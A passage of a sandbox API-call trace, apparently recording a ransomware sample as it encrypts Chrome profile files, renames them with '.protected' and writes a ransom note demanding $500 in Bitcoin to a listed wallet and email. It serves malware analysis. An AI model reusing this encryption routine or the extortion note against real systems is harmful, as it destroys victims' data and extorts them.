lpSrch=".zip") returned 0x0 [0078.527] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.528] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.528] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.528] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.528] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.528] CloseHandle (hObject=0x158) returned 1 [0078.528] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.protected") returned 121 [0078.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension 
State\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001.protected")) returned 1 [0078.529] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.529] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.529] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\RESTORE_FILES.txt") returned 113 [0078.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.529] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.529] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.530] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.530] WriteFile (in: hFile=0x154, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.530] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.530] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.530] CloseHandle (hObject=0x154) returned 1 [0078.531] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="Windows") returned -1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="Program Files") returned -1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="Program Files (x86)") returned -1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="$Recycle.bin") returned 1 [0078.531] lstrcmpiW (lpString1="Extensions", lpString2="System Volume Information") returned -1 [0078.531] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 90 [0078.531] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0078.531] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0078.531] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*") returned 92 [0078.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", 
lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.542] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.542] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.542] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.542] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.542] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.543] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\.") returned 92 [0078.543] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.543] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.543] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.543] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.543] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.543] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.543] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.543] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\..") returned 93 [0078.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.543] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="Windows") returned -1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="Program Files") returned -1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", 
lpString2="Program Files (x86)") returned -1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="$Recycle.bin") returned 1 [0078.543] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="System Volume Information") returned -1 [0078.543] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek") returned 123 [0078.543] lstrcmpW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2=".") returned 1 [0078.543] lstrcmpW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="..") returned 1 [0078.543] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*") returned 125 [0078.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0078.550] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.550] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.550] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.550] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.550] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\.") returned 125 [0078.550] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.550] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: 
lpFindFileData=0x295e080) returned 1 [0078.550] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.550] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.550] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.550] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.550] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\..") returned 126 [0078.550] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.550] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.550] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="Windows") returned -1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files") returned -1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files (x86)") returned -1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="$Recycle.bin") returned 1 [0078.550] lstrcmpiW (lpString1="0.9_0", lpString2="System Volume Information") returned -1 [0078.550] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 129 [0078.550] lstrcmpW (lpString1="0.9_0", lpString2=".") returned 1 [0078.550] lstrcmpW (lpString1="0.9_0", lpString2="..") returned 1 [0078.551] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*") returned 131 [0078.551] FindFirstFileW 
(in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0078.567] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.567] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.567] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.567] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.567] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.567] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\.") returned 131 [0078.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.567] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.567] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.567] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.567] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.567] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.567] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.567] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\..") returned 132 [0078.567] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.567] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.567] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.567] lstrcmpiW 
(lpString1="icon_128.png", lpString2="Windows") returned -1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files") returned -1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="Program Files (x86)") returned -1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="$Recycle.bin") returned 1 [0078.567] lstrcmpiW (lpString1="icon_128.png", lpString2="System Volume Information") returned -1 [0078.567] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.567] StrStrIW (lpFirst="icon_128.png", lpSrch=".protected") returned 0x0 [0078.567] lstrcmpW (lpString1="icon_128.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.567] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.567] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.569] StrStrW (lpFirst="icon_128.png", lpSrch=".txt") returned 0x0 [0078.569] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.569] StrStrW (lpFirst="icon_128.png", lpSrch=".rar") returned 0x0 [0078.569] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png") returned 142 [0078.569] StrStrW (lpFirst="icon_128.png", lpSrch=".zip") returned 0x0 [0078.569] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xd2c, lpOverlapped=0x0) returned 1 [0078.581] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffff2d4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.581] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xd2c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xd2c, lpOverlapped=0x0) returned 1 [0078.581] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.581] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.581] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.581] CloseHandle (hObject=0x160) returned 1 [0078.582] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.protected") returned 152 [0078.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png.protected")) returned 1 [0078.583] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0078.583] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0078.583] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0078.583] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0078.583] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.583] CryptEncrypt (in: hKey=0x444cf8, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0078.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0078.583] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png") returned 141 [0078.583] StrStrW (lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0078.584] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0xa0, lpOverlapped=0x0) returned 1 [0078.584] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.584] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xa0, 
lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xa0, lpOverlapped=0x0) returned 1 [0078.585] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.585] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.585] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.585] CloseHandle (hObject=0x160) returned 1 [0078.585] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.protected") returned 151 [0078.585] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png.protected")) returned 1 [0078.586] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 